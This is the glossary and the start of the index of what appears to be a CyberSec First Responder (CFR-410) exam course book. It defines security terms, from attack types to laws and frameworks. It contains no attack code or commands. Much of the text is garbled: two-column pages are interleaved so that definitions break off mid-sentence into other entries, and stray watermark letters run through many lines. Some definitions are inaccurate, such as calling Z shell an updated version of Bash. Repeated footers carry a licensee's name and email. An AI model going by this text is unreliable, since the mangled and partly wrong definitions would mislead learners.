collectively exploit those computers to mount that assists other government entities with their
attacks. information security.

D
BPA CFAA
(business partnership agreement) Defines how (Computer Fraud and Abuse Act) A U.S. law
a partnership between business entities will be
conducted, and what exactly is expected of
each entity in terms of services, finances, and
security.
or
that prohibits users from accessing computer
systems without authorization.

chain of custody
e
The record of evidence handling from
at

buffer overflow collection to presentation in court to disposal.


An attack in which data goes past the boundary
of the destination buffer and begins to corrupt change management
lic

adjacent memory. The process through which changes to the


configuration of information systems are
BYOD monitored and controlled, as part of the
up

(bring your own device) A phenomenon in organization's overall configuration


which employees use their personal mobile management efforts.
devices in the workplace.
D

CHECK
CAM table A framework established by the UK security
(content-addressable memory) A table used by group CESG to ensure that government
ot

switches to map MAC addresses to ports to agencies can identify vulnerabilities to their
forward packets to specific interfaces. confidentiality, integrity, and availability
N

through testing of networks and other systems.


CAN-SPAM
(Controlling the Assault of Non-Solicited CIA triad
o

Pornography and Marketing) A U.S federal law (confidentiality, integrity, availability) The three
that outlines various rules for the sending of principles of security control and management.
D

commercial email messages. Also known as the information security triad.

CAPEC cipher
(Common Attack Pattern Enumeration and An algorithm used to encrypt or decrypt data.
Classification) A database that classifies Algorithms can be simple mechanical
specific attack patterns. Maintained by the substitutions, but in electronic cryptography,
MITRE Corporation.

Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
512 | CyberSec First Responder® (Exam CFR-410)

they are generally complex mathematical compensating control


functions. A security measure that takes on risk mitigation
when a primary control fails or cannot
CIS completely meet expectations.
(Center for Internet Security) A non-profit
organization that provides security resources Computer Misuse Act
and information to various industries. A UK law introduced in 1990 that defines
three computer-assisted criminal offenses.
CIS Controls

e
A list of various cybersecurity control confidentiality

ut
categories and action items compiled by the The fundamental security goal of keeping
Center for Internet Security (CIS). information and communications private and
protecting them from unauthorized access.

ib
clickjacking
An attack in which an attacker tricks a client configuration management

tr
into clicking a web page link that is different The process through which an organization's
from where they had intended to go. information systems components are kept in a

is
controlled state that meets the organization's
closed source intelligence requirements, including those for security and
Information that is obtained through private

D
compliance.
sources.
continuous monitoring and
CMMC

program for certifying U.S. government


contractors as having met cybersecurity
or
(Cybersecurity Model Maturity Certification) A
improvement
The technique of constantly evaluating an
environment for changes so that new risks may
be more quickly detected and business
e
standards set forth by the Department of operations improved upon.
at

Defense (DoD) and an accreditation board of


security professionals. cookie hijacking
An attack in which an attacker intercepts a
lic

COBIT cookie to inject malicious code that they can


(Control Objectives for Information and use to take control of the session.
Related Technology) An IT governance
up

framework developed by ISACA that cookie poisoning


incorporates elements of risk management and An attack in which an attacker modifies the
mitigation. contents of a cookie after it has been generated
D

and sent by the web service to the client's


code injection browser so that the newly modified cookie can
See command injection. be used to exploit vulnerabilities in a web app.
ot

coercive parsing COPPA


An attack in which an attacker maliciously
N

(Children's Online Privacy Protection Act) A


modifies the way in which SOAP parses XML- U.S. federal law that is meant to protect the
based requests. privacy of personal information about children
o

under the age of 13.


command and control
D

An infrastructure of computers with which correlation analysis


attackers direct, distribute, and control malware The process of identifying dependent
over botnets. relationships between different forms of
information that indicate some larger pattern
command injection of behavior.
An attack in which an attacker supplies an
application or web page with malicious code.

Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 513

countermeasure
An action taken to defend against the effects of some unwanted event or incident.

CREST
(Council for Registered Ethical Security Testers) A non-profit UK-based organization that specializes in penetration testing services.

cryptography
The science of altering data to make it unintelligible to unauthorized parties.

CSA
(Cloud Security Alliance) A coalition of several member organizations that seek to promote best practices for the security of cloud computing.

CSIRT
(cybersecurity incident response team) A collection of individuals who are trained in the proper collection and preservation techniques for investigating security incidents.

CSM
(continuous security monitoring) The practice of conducting ongoing monitoring of the security of the organization's networks, information, and systems, and responding appropriately as situations change.

CSRF
(cross-site request forgery) See XSRF.

CVE
(Common Vulnerabilities and Exposures) A dictionary of vulnerabilities maintained by the MITRE Corporation.

CVSS
(Common Vulnerability Scoring System) A risk management approach to quantifying vulnerability data and then taking into account the severity of harm to different types of systems or information.

CWE
(Common Weakness Enumeration) A database of software-related vulnerabilities. Maintained by the MITRE Corporation.

Cyber Kill Chain
A model developed by Lockheed Martin that describes the anatomy of an information security threat.

cyberlaw
Law that governs the behavior of individuals and groups in the use of computers, the Internet, and other information technology domains.

cyberterrorist
An attacker who uses computers to damage other computer systems and generally spread alarm.

data analytics
The process of applying analytical techniques to data in order to reveal patterns that can inform decision making.

data exfiltration
The malicious transfer of data from one system to another.

Data Protection Act
A UK law that regulates the processing of personal information.

data remanence
See data remnants.

data remnants
Leftover information on a storage medium even after basic attempts have been made to remove that data.

DDoS attack
(distributed denial of service) A type of DoS attack that uses multiple computers on disparate networks to launch the attack from many simultaneous sources.

de-perimeterization
The process of shifting, reducing, or removing some of the organization's boundaries to facilitate interactions with the world outside of its domain.

deep learning
A type of machine learning that makes complex decisions using multiple layers of information.


defense in depth
A security strategy that positions the layers of network security as network traffic roadblocks; each layer is intended to slow an attack's progress, rather than eliminating it outright.

degaussing
The process of rendering a magnetic storage drive inoperable and its data unrecoverable by eliminating the drive's magnetic charge.

DES
(Data Encryption Standard) A block cipher symmetric encryption algorithm that encrypts data in 64-bit blocks using a 56-bit key with 8 bits used for parity.

DHCP spoofing
(Dynamic Host Configuration Protocol) An attack in which an attacker responds to a client requesting address assignment from a DHCP server.

digital signature
A message digest that has been encrypted again with a user's private key.

directory traversal
An attack in which an attacker accesses files from a location that the attacker is not authorized to access.

disassembler
Reverse engineering software that converts machine language code into assembly language code.

DNS amplification attack
(Domain Name System) A type of reflected attack in which a small query to a DNS server returns a reply up to eight times larger and makes it easier for the attacker to flood the target.

DNS filtering
The process of restricting the domains users can access based on pre-configured blacklists or whitelists.

DNS hijacking
An attack in which an attacker modifies a computer's DNS configurations to point to a malicious DNS server.

DNS poisoning
An attack in which an attacker modifies a DNS server's cache to return a fraudulent IP address to users.

DOM-based attack
(Document Object Model) A cross-site scripting (XSS) attack in which an attacker takes advantage of a web app's client-side implementation of JavaScript to execute their attack solely on the client.

DoS attack
(denial of service attack) A type of attack in which an attacker attempts to disrupt or disable systems that provide network or application services by various means.

doxing
The practice of publishing an individual's personally identifiable information online.

drone
See bot.

DRP
(disaster recovery plan) A policy that defines how people and resources will be protected in a disaster, and how the organization will recover from the disaster.

dumpster diving
A human-based attack where the goal is to reclaim important information by inspecting the contents of trash containers.

EDR
(endpoint detection and response) A system that uses various techniques to monitor and analyze data collected from network hosts, and responds to protect those hosts from threats.

enumeration
The last step of reconnaissance when the attacker tries to get a list of resources on the network, host, or system as a whole to identify potential targets for further attack.

ETL
(extract, transform, load) The process of combining data from multiple sources, preparing the data, and loading the resulting data into a destination format.


evil twins
Access points on a network that fool users into believing they are legitimate.

file carving
The process of extracting data from a computer when that data has no associated file system metadata.

file inclusion
An attack in which an attacker adds a file to the running process of a web app or website.

fingerprinting
The technique of determining the type of operating system and services a target uses by studying the types of packets and the characteristics of these packets during a communications session.

firewall
Any software or hardware device that protects a system or network by blocking unwanted network traffic.

FISMA
(Federal Information Security Management Act) A U.S. law enacted in 2002 and amended in 2014 that includes several provisions that require federal organizations to more clearly document and assess information systems security.

flash crowd
When used in regard to network traffic, this refers to a situation in which the network or host suddenly receives an unusually large amount of traffic.

footprinting
The phase in an attack or penetration test in which the attacker or tester gathers information about the target before attacking it.

GAPP
(Generally Accepted Privacy Principles) A framework that provides guidance to chartered accountants (CA) and certified public accountants (CPA) in maintaining the security of personally identifiable information (PII).

GDPR
(General Data Protection Regulation) A European Union regulation that regulates the export of EU citizens' personal data for entities that collect or process this data, even if said entities are not based in the EU.

geo-velocity
The practice of validating whether or not certain account behavior is possible given the speed of current travel technology.

GHDB
(Google Hacking Database) A collection of web-based exploits that can be launched through the Google search engine.

GLBA
(Gramm–Leach–Bliley Act) A U.S. federal law enacted in 1999 that deregulated banks, but also instituted requirements that help protect the privacy of an individual's financial information that is held by financial institutions.

golden ticket
A Kerberos authentication ticket that can grant other tickets in an Active Directory environment.

grey box
A pen test approach that simulates an inside attacker that knows something about a target, but not everything. The pen tester must do additional reconnaissance beyond what has been provided to them.

hacktivist
An attacker that is motivated by a social issue or political cause.

hash
The value that results from a hashing operation.

hashing
A process or function that transforms plaintext input into an indecipherable fixed-length output and ensures that this process cannot be feasibly reversed.


heuristic analysis
The process of identifying the way in which an entity acts in a specific environment, and making decisions about the nature of the entity based on this.

HIPAA
(Health Insurance Portability and Accountability Act) A law enacted in 1996 to establish several rules and regulations regarding healthcare in the United States.

hoax
An email-based or web-based attack that tricks the user into performing undesired actions, such as deleting important system files in an attempt to remove a virus, or sending money or important information via email or online forms.

honeypot
The practice of tricking an attacker into accessing an isolated network or system so that the attacker may be monitored and eventually dealt with.

horizontal privilege escalation
When a user accesses or modifies specific resources that they are not entitled to.

IA
(interoperability agreement) General term for any document that outlines a business partnership or collaboration in which all entities exchange some resources while working together.

IAM
(identity and access management) The information security process of protecting how users and devices are identified in a system, and how they are able to access resources based on these identities.

ICMP flood
(Internet Control Message Protocol) An attack based on sending high volumes of ICMP ping packets to a target.

identity theft
The stealing of an individual's personal information, including their authorized access credentials to a system, network, or an organization.

IDS
(intrusion detection system) A system that scans, audits, and monitors the security infrastructure for signs of attacks in progress.

impersonation
A human-based attack where an attacker pretends to be someone they are not.

incident response
The process by which an organization reacts to and reports security breaches within an acceptable time period.

inherent risk
Risk that an event will pose if no controls are put in place to mitigate it.

input validation
Any technique used to ensure that the data entered into a field or variable in an application is handled appropriately by that application.

integrity
The fundamental security goal of ensuring that electronic data is not altered or tampered with.

interference
Radio waves disrupting wireless signals.

IOC
(indicator of compromise) A sign that an asset or network has been attacked or is currently under attack.

IPS
(intrusion prevention system) A system that scans, audits, and monitors the security infrastructure for signs of attacks in progress, and actively blocks attacks.

IRC
(Internet Relay Chat) A group communications protocol that enables users to chat, send private messages, and share files.

ISA
(interconnection security agreement) Document geared toward the information systems of partnered entities to ensure that the


use of inter-organizational technology meets a certain security standard for CIA.

ISA/IEC-62443
A series of standards that provides guidance and best practices for implementing security in industrial control systems (ICSs).

ISACA
An organization that promotes information technology and cybersecurity through frameworks like COBIT and certification programs like Certified Information Security Manager (CISM).

ISF
(Information Security Forum) An independent, not-for-profit organization that looks at key issues in security and risk management, and develops best practices that meet the needs of its members.

ISO
(International Organization for Standardization) An organization with global reach that promotes standards for many different industries.

ISO/IEC 27000 series
A large family of IT security standards developed.

ISO/IEC 29100
A framework that outlines various concerns and solutions regarding data privacy.

ITAF
(Information Technology Assurance Framework) A framework developed by ISACA that provides guidance for IT assurance auditing.

job rotation
The principle that establishes that no one person stays in a vital job role for too long a time period.

jump box
A hardened server that acts as a bridge between two security zones or trusted networks.

Kali Linux
A free suite of open source tools built into a custom Linux distribution, maintained by Offensive Security.

lateral movement
The process by which an attacker is able to move from one part of a computing environment to another.

least privilege
The principle that states that users and software should only have the minimal level of access that is necessary for them to perform the duties required of them.

levels of authority
A hierarchy that dictates what actions an individual can take, and what responsibilities they have.

LFI
(local file inclusion) An attack in which an attacker executes a script to run a file already existing on a web server.

live VM migration
The act of moving a virtual machine (VM) from one physical host to another with no impact on the VM's availability, which can be exploited by attackers.

LLR
(lessons learned report) See AAR.

log auditing
The process of evaluating an organization's logging architecture to determine if it is meeting a set of predefined criteria.

log enrichment
The process of making logs more readable and increasing their usefulness to address some challenges in processing their information.

logic bomb
A malicious piece of code that sits dormant on a target computer until it is triggered by a specific event, such as a specific date.

logical controls
See technical controls.


long tail analysis
In cybersecurity analysis, the technique of culling low-frequency events in order to identify events that are more likely to be anomalous.

machine learning
An AI discipline in which a machine is able to gradually improve its estimative capabilities without being given explicit instructions.

malvertisement
Malicious code delivered through online advertisements.

malware
Malicious software.

man-in-the-middle attack
A form of eavesdropping where the attacker makes an independent connection between two victims and accesses or disrupts sensitive information.

management controls
See administrative controls.

mandatory vacation
The principle that states when and how long an employee must take time off from work so that their activities may be subjected to a security review.

masked attack
A type of brute-force password cracking that uses placeholders for predictable values based on typical user behavior when it comes to designing passwords.

MDM
(mobile device management) The process of tracking, controlling, and securing the organization's mobile infrastructure.

memory leak
The result of an application allocating memory and then not cleaning that memory up by freeing it when it is no longer required for usage by the application.

memory resident
The characteristic of code being in memory even after its application has terminated.

message digest
See hash.

MITRE Corporation
A non-profit organization that manages research and development centers that receive federal funding from entities like the DoD and NIST.

MOU
(memorandum of understanding) An informal business agreement that is usually not legally binding and typically does not involve the exchange of money.

MSA
(master service agreement) A document that lays the groundwork for any future business documents that two parties may agree to.

NAC
(network access control) The collected protocols, policies, and hardware that govern access on device network interconnections.

NBAD
(network behavior anomaly detection) A security monitoring tool that monitors network packets for anomalous behavior based on known signatures.

NDA
(non-disclosure agreement) An agreement between entities stipulating that they will not share confidential information, knowledge, or materials with unauthorized third parties.

NERC 1300
A standard published by the North American Electric Reliability Corporation (NERC) for the security of bulk electric systems (BESs).

NetFlow
A protocol included in many network devices that enables network administrators to monitor the flow of network traffic across these devices.

NGFW
(next-generation firewall) A firewall that goes beyond traditional firewall functionality by operating at the application layer and protocol stack.


NIST
(National Institute of Standards and Technology) A U.S. government agency that promotes a wide range of standards, including those that focus on cybersecurity.

NIST Cybersecurity Framework
A unified framework that provides guidance to organizations for managing risk in their environments.

NIST Privacy Framework
A framework that provides guidance to organizations for managing risks to data privacy.

NIST SP 800-61
(NIST Special Publication 800-61) A set of guidance and recommendations during the incident response process.

non-repudiation
The security goal of ensuring that the party that sent a transmission or created data remains associated with that data and cannot deny sending or creating that data.

normalization
In the context of network security intelligence collection, the process of converting security-related data from network logs, system logs, application APIs, and other sources into common formats that can easily be analyzed.

NTP reflected attack
(Network Time Protocol) An attack in which an attacker sends a small query to an NTP server, which then returns a much larger response that includes data from the last 600 machines the server has communicated with.

NVD
(National Vulnerability Database) A superset of the CVE database maintained by NIST.

OLA
(operating-level agreement) An agreement that identifies and defines the working relationships between groups or divisions of an organization as they share responsibilities toward fulfilling one or more SLAs with their internal or external customers.

open source intelligence
Information that is obtained through public sources.

operational controls
See administrative controls.

order of volatility
The order in which data must be collected or preserved after an incident before the data deteriorates, is erased, or is overwritten.

OSSTMM
(Open Source Security Testing Methodology Manual) A manual developed by the Institute for Security and Open Methodologies (ISECOM) that outlines every area of an organization that needs testing, as well as goes into details about how to conduct the relevant tests.

OVAL
(Open Vulnerability and Assessment Language) An open standard that promotes communication about cybersecurity information. Maintained by the MITRE Corporation.

OWASP
(Open Web Application Security Project) A community effort that provides free access to a number of secure programming resources and best practices.

packet crafting
A method of manually generating packets (instead of modifying existing network traffic) to test the behavior of network devices, enabling a hacker to enumerate firewall or intrusion detection rules that are in place.

packet trace analysis
The act of examining data packet communications to reveal insights without digging into packet content, such as when the packet contents are encrypted.

parameterized query
A defense against SQL injection attacks that incorporates placeholders for some of a query's parameters.


pass the hash
An offline password attack technique that takes an account's cached credentials when they are logged in to an SSO system, and steals those cached credentials to use on the attacker's own system.

password cracking
The recovery of secret passwords from data stored or transmitted by a computer.

password sniffing
The practice of monitoring for password data in network transmissions.

patch management
The process of collecting, evaluating, testing, and deploying fixes to computer software.

PCI DSS
(Payment Card Industry Data Security Standard) A proprietary standard that specifies how organizations should handle information security for major card brands to increase controls on cardholder data and reduce fraudulent use of accounts.

penetration test
A test that uses active tools and security utilities to evaluate security by executing an authorized attack on a system.

permanent DoS attack
See phlashing.

pharming
An attack in which a request for a website, typically an e-commerce site, is redirected to a similar-looking, but fake, website.

phishing
A type of social engineering attack in which the attacker sends messages from a spoofed source, such as a bank, to try to elicit private information from the victim. Phishing usually refers to such messages that use email as the delivery medium.

phlashing
An attack in which an attacker targets the actual hardware of a system to prevent the victim from easily recovering from a DoS.

physical controls
Measures that restrict, detect, and monitor access to specific physical areas or assets.

piggybacking
Similar to tailgating, except the legitimate employee is aware that someone is following behind them.

ping flood
See ICMP flood.

PIPEDA
(Personal Information Protection and Electronic Documents Act) A Canadian act, applying to all organizations, that regulates the collection, use, and disclosure of personal information and brings Canada into compliance with European Union privacy regulations.

pivoting
An attack in which an attacker uses a compromised host (the pivot) as a platform from which to spread an attack to other points in the network.

polymorphic virus
A virus that changes its code when it infects a new file, making it very difficult for anti-malware to keep up.

port forwarding
An attack in which an attacker uses a host as a pivot and is able to access one of its open TCP/IP ports. The attacker then forwards traffic from this port to a host's port on a different subnet using pivoting methods.

port scanner
A device or application that scans a network to identify what devices are reachable (alive), what ports on these devices are active, and what protocols these active ports use to communicate.

prepared statement
See parameterized query.

private key
During asymmetric encryption, this key is kept secret by one party and never shared. The


private key in a pair can decrypt data encoded with the corresponding public key.

privilege elevation
See vertical privilege escalation.

privilege escalation
The technique of obtaining access to additional resources or functionality that an entity is normally not allowed access to.

program packer
A partly compressed executable that also includes decompression code that will decompress the program before executing it.

PsExec
A Windows-based remote access service that doesn't require setup on the host being accessed remotely.

PTES
(Penetration Testing Execution Standard) A standard established in 2009 that covers seven areas of penetration testing and includes an accompanying technical guide.

public key
During asymmetric encryption, this key is given to anyone and can be used to encrypt data.

qualitative analysis
A risk analysis method that uses descriptions and words to measure the likelihood and impact of risk.

quantitative analysis
A risk analysis method that is based completely on numeric values.

quid pro quo
A social engineering attack in which an attacker promises to provide a gift or favor to a victim in exchange for useful information.

rainbow table
An offline password attack technique that uses sets of pre-computed passwords and their hashes stored in a file that dramatically reduce the time needed to crack a password.

ransomware
Malicious code that restricts the victim's access to their computer or the data on it. The attacker then demands a ransom be paid under threat of keeping the restriction, destroying the information they have locked down, or exposing the information publicly.

reflected attack
A cross-site scripting (XSS) attack in which an attacker crafts a malicious form or other request to be sent to a legitimate web server. The victim selects the malicious request and the script is sent to the server and reflected off it onto the victim's browser.

reflected DoS attack
An attack in which a forged source IP address (the target) is used when sending requests to a large number of computers. This causes those systems to send a reply to the target system, causing a DoS condition.

regular expression
A group of characters that describe how to execute a specific search pattern on a given text.

residual risk
Risk that remains even after controls are put into place.

resource exhaustion
A type of DoS vulnerability that occurs when an application does not properly restrict access to requested or needed resources.

reverse engineering
The process of analyzing the structure of hardware or software to reveal more about how it functions.

RFC 2196
(Requests for Comments 2196) A publication that provides guidance on securing sites that have Internet-connected systems.

RFI
(remote file inclusion) An attack in which an attacker executes a script to include an external file in a running web app or website.


risk acceptance
The response of determining that a risk is within the organization's appetite and no additional action is needed.

risk analysis
The security process used for assessing risk damages that can affect an organization.

risk avoidance
The response of eliminating the source of a risk so that the risk is removed entirely.

risk exposure
The property that dictates how susceptible an organization is to loss.

risk management
The cyclical process of identifying, assessing, analyzing, and responding to risks.

risk mitigation
The response of reducing risk to fit within an organization's risk appetite.

risk transference
The response of moving the responsibility of risk to another entity.

RMF
(Risk Management Framework) A framework developed by NIST that includes processes for integrating information assurance and risk management strategies into the systems development lifecycle (SDLC).

ROE
(rules of engagement) A definition of how a pen test will be executed and what constraints will be in place.

rogue access point
An unauthorized wireless access point (WAP) on a corporate or private network that can enable man-in-the-middle attacks and access to private information.

rogue account
An unauthorized or compromised account on a system.

rogue hardware
An unauthorized physical device attached to a network or asset.

root cause analysis
The process of attempting to determine the catalyst of an incident.

rootkit
Malicious code that is intended to take full or partial control of a system at the lowest levels.

salting
The act of adding a random value to the plaintext input in a hashing operation to defend against rainbow table attacks.

sandboxing
The practice of isolating an environment from a larger system to guarantee that the environment runs in a controlled, secure fashion.

sanitization
The process of thoroughly and completely removing data from a storage medium so that the data cannot be recovered.

scanning
An active phase of reconnaissance that involves gathering information about a target.

SCAP
(Security Content Automation Protocol) A framework developed by NIST that automates the vulnerability management process, including identifying flaws in security configurations.

script kiddie
An inexperienced, unskilled attacker that typically uses tools or scripts created by others.

SDEE
(Security Device Event Exchange) An alert format and transport protocol specification for intrusion detection systems.

SDL
(Security Development Lifecycle) Microsoft's security framework for application development that supports dynamic development processes.


SDLC
(systems development lifecycle) The practice of designing and deploying technology systems from initial planning all the way to end-of-life.

SDN
(software-defined networking) An approach to networking architecture that simplifies management by centralizing control over a network.

security intelligence
The process through which data generated in the ongoing use of information systems is collected, processed, integrated, evaluated, analyzed, and interpreted.

semi-quantitative analysis
A risk analysis method that blends qualitative and quantitative analysis methods together.

separation of duties
The principle that establishes that no one person should have too much power or responsibility.

session fixation
An attack that forces a user to browse a website in the context of a known and valid session.

session hijacking
An attack that exploits a computer during an active session to obtain unauthorized access to data, services, and networks.

session prediction
An attack that focuses on identifying possible weaknesses in the generation of session tokens that will enable an attacker to predict future valid session values.

shoulder surfing
A human-based attack where the goal is to look over the shoulder of an individual as they enter password information or a PIN.

SIEM
(security information and event management) A hardware and/or software solution that provides real-time or near-real-time analysis of security alerts generated by network hardware and applications.

sinkhole
A network defense method of redirecting outbound malicious traffic to an internal host so that it cannot escape outside the network.

sinkhole attack
The act of creating a single node through which all wireless traffic goes and then tricking the other nodes into redirecting their traffic.

site book
A document or collection of documents that take stock and inventory of all known assets, configurations, protocols, and processes that make up a particular site.

SLA
(service-level agreement) A business agreement that outlines what services and support will be provided to a client.

Slashdot effect
The phenomenon in which thousands of users all flock to a website at once, overwhelm the servers, and unintentionally cause a DoS condition.

SLE
(single loss expectancy) The financial loss expected from a single adverse event.

SMiShing
A form of phishing that uses SMS text messages to trick a victim into revealing information.

Smurf attack
See ICMP flood.

SOA
(statement of applicability) A document that identifies the controls in place in an organization and explains their purpose.

SOAP
(Simple Object Access Protocol) An XML-based web services protocol that is used to exchange messages.

SOC
(security operations center) The location where security professionals monitor and protect critical information assets in an organization.

Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
524 | CyberSec First Responder® (Exam CFR-410)

social engineering SQL injection


The practice of deceiving people into giving An attack in which an attacker injects a
away access or confidential information to database query into the input data directed at a
unauthorized parties. server by accessing the client side of the
application.
SOX
(Sarbanes–Oxley Act) A U.S. law enacted in SSAE 18
2002 that dictates requirements for the storage (Statement on Standards for Attestation
and retention of documents relating to an Engagements no. 18) An auditing standard

e
organization's financial and business published by the American Institute of

ut
operations. Certified Public Accountants (AICPA) that
focuses on financial reporting.
spam

ib
An email-based threat that floods the user's SSH
inbox with emails that typically carry (Secure Shell) A protocol for secure remote

tr
unsolicited advertising material for products or logon and secure transfer of data.
other spurious content, and which sometimes

is
deliver malware. It can also be used with social SSL/TLS
networking sites such as Facebook and (Secure Sockets Layer/Transport Layer

D
Twitter. Security) A security protocol that uses
certificates and public key cryptography for
SPAN mutual authentication and data encryption over
(switch port analyzer) An approach to
or
capturing network data in which a network
appliance copies incoming and outgoing traffic
to a separate port on the appliance, which is
a TCP/IP connection.

SSO
(single sign-on) An authentication mechanism
e
then forwarded to another device for analysis. that provides users with one-time
at

authentication to multiple resources, servers, or


spear phishing sites.
An email-based or web-based form of phishing
lic

that targets specific individuals. Standard of Good Practice for


Information Security
spim A standard published by the ISF that focuses
up

A spam attack that is propagated through on helping businesses understand and address
instant messaging rather than email. evolving security issues in the subject areas of
compliance, threats, and risk management.
D

spoofing
A software-based attack where the goal is to steganography
assume the identity of a user, process, address, A security technique that hides a secret
ot

or other unique identifier. message by enclosing it in an ordinary file.

spyware stored attack


N

Surreptitiously installed malicious software that A cross-site scripting (XSS) attack in which an
is intended to track and report the usage of a attacker injects malicious code or links into a
o

target system or collect other data the author website's forums, databases, or other data.
wishes to obtain.
D

STRIDE
SQL (spoofing, tampering, repudiation, information
(Structured Query Language) A language that disclosure, denial of service, and elevation of
applications use to interact with a database to privilege) An acronym used to classify threats.
perform four basic functions: selecting,
inserting, deleting, and updating data in the
database.

Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 525

supply chain attack threat profile


An attack that targets the end-to-end process A comprehensive list of a threat's
of manufacturing, distributing, and handling characteristics, including skill, motive,
goods and services. intentions, and vectors.

system hardening Tigerscheme


The process by which a host or other device is A commercial certification scheme for
made more secure through the reduction of technical security specialists, managed by the
that device's attack surface. University of South Wales Commercial

e
Services.

ut
tabletop exercise
A discussion of simulated emergency situations traffic analysis
and security incidents. See packet trace analysis.

ib
tailgating transport encryption

tr
A human-based attack where the attacker slips The technique of encrypting data that is in
in through a secure area following an unaware transit, usually over a network like the Internet.

is
legitimate employee.
trend analysis
TAP The process of detecting patterns within a

D
(test access point) A device that captures dataset over time, and using those patterns to
network data that flows between network make predictions about future events or to
appliances, then forwards that data along
separate ports to another device for analysis.

TCPED
or
better understand past events.

Trojan horse
A type of malware that hides itself on an
e
(tasking, collection, processing, exploitation, infected system and can cause damage to a
at

and dissemination) The five primary phases of system or give an attacker a platform for
the threat intelligence lifecycle. monitoring and/or controlling a system.
lic

technical controls TTP


Hardware or software installations that are (tactics, techniques, and procedures) The three
implemented to monitor and prevent threats main variable factors that make up a threat.
up

and attacks to computer systems and services.


typo squatting
threat actor See URL hijacking.
D

An attacker. Typically used to denote that an


attacker is of a certain type. UDDI
(Universal Description, Discovery, and
ot

threat hunting Integration) An open XML-based protocol


The technique in which a team of security that enables web service devices to register,
personnel will actively "hunt" for indicators of find, and interact with each other on the
N

compromise in a particular environment. Internet.

threat intelligence UDP flood


o

The process of addressing information about (User Datagram Protocol) An attack in which
D

emerging threats and threat sources. an attacker attempts to overwhelm the target
system with UDP ping requests.
threat modeling
The process of identifying and assessing the update management
possible attack vectors that target systems. See patch management.

Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
526 | CyberSec First Responder® (Exam CFR-410)

URL hijacking vulnerability scan


An attack that exploits user errors in typing by A scan that various tools and security utilities
registering malicious websites with common use to identify and quantify vulnerabilities
misspellings of legitimate words and websites. within a system, such as lacking security
controls and common misconfigurations, but
US-CERT does not directly test the security features of
(United States Computer Emergency Readiness that system.
Team) A government organization that
analyzes and distributes information about WAF

e
threats to cybersecurity. (web application firewall) A type of firewall

ut
that controls web-based application-layer
vertical privilege escalation traffic in the network.
An attack in which an attacker can perform

ib
functions that are normally assigned to users in war driving
higher roles, and often explicitly denied to the The act of searching for a wireless network

tr
attacker. signal while in a moving vehicle.

is
virtualization web service
The process of creating a simulation of a Any software that provides network

D
computing environment, where the virtualized communication between devices.
system can simulate the hardware, operating
system, and applications of a typical computer whaling

virus
or
without being a separate physical computer.

A malicious piece of code that spreads from


An email-based or web-based form of phishing
that targets particularly wealthy individuals.

white box
e
one computer to another by attaching itself to A pen test approach that simulates an inside
at

other files through a process of replication. attacker that knows everything about the
target. The pen tester does not need to
vishing perform their own reconnaissance, as this is
lic

A human-based attack where the attacker provided for them.


extracts information while speaking over the
phone or leveraging IP-based voice messaging whitelisting
up

services (VoIP). The process of allowing specific systems,


software, services, and so on, to use a resource.
VM escape Anything not on the list is blocked.
D

An exploit where an attacker executes code in


a VM that enables an application running on Windows PowerShell
the VM to "escape" the virtual environment A command shell and scripting language built
ot

and interact directly with the hypervisor. on the .NET Framework.

vulnerability assessment WMIC


N

An evaluation of a system's security and ability (Windows Management Instrumentation


to meet compliance requirements based on the Command-line) A tool that provides an
o

configuration state of the system, as interface into Windows Management


represented by information collected from the Instrumentation (WMI) for local or remote
D

system. management of computers.

vulnerability management worm


The methodical process of discovering, Malware that replicates itself across the
analyzing, and controlling every vulnerability infected system, but does not attach itself to
associated with unacceptable risks. other programs or files.

Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 527

WPS
(Wi-Fi Protected Setup) An insecure feature of
WPA and WPA2 that enables enrollment in a
wireless network based on an 8-digit PIN.

WSDL
(Web Services Description Language) An
XML-based protocol for transmitting and
receiving information used in web applications

e
to a variety of device types.

ut
XSRF
(cross-site request forgery) A web application

ib
attack where an attacker takes advantage of the
trust established between an authorized user of

tr
a website and the website itself.

is
XSS
(cross-site scripting) A web application attack

D
where the attacker takes advantage of scripting
and input validation vulnerabilities in an
interactive website to attack legitimate users.

Z shell
An updated version of the Bash shell that has
various improvements to the shell but the
or
e
same basic syntax as Bash.
at

zombie
See bot.
lic
up
D
ot
N
o
D

Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M


Index

A
AAR
    important questions 403
    overview 402
account management 43
Active Directory analysis tools 351
active fingerprinting 242
administrative controls 26
Address Resolution Protocol, See ARP
advanced persistent threats, See APTs
Adversarial Tactics, Techniques, and Common Knowledge, See ATT&CK
adware
    techniques 145
after-action report, See AAR
ALE 20
analysis methods 281
annual loss expectancy, See ALE
annual rate of occurrence, See ARO
anomaly analysis 282
anti-forensics 209
application logs 304
APTs
    overview 187
armored viruses 144
ARO 19
ARP
    poisoning 152
    spoofing 152
ATT&CK 212
attack
    evasion techniques, for DoS 163
    networks and systems 87
    passwords 262
    simulated 262
    targets 131
    technique criteria 61
    trees 81
    vectors 61
attack surface
    defined 122
    mapping 261
    scanning 261
auditing
    asset identification 221
    compliance audit 220
    objectives 219
    overview 218
    policies and procedures 219
    results communication 223
    results documentation 222
    tools 222
authorization 112
availability 18

B
backdoors 188
baiting 110
base metrics 27
Bash 322
bastion host 411
BCP 392
beaconing 180
behavioral analysis 282
BIA 46
big data
    overview 174
    threats 174
bit-stream imaging 445
black box test 256
black hole routing 414
blacklisting 412
Bluetooth 366, 410
botnets 162, 163
BPA 46
bricking 162
bring your own device, See BYOD
buffer overflow 161, 210
business continuity plan, See BCP
business impact analysis, See BIA
business partnership agreement, See BPA
BYOD
    threats 169
    trends in mobile security 168

C
C&C 180, 182
CAM
    overview 287
    tables 287
CAN-SPAM 15
CAPEC 29
CBEST 254
CDM 274
Center for Internet Security, See CIS
CESG 254
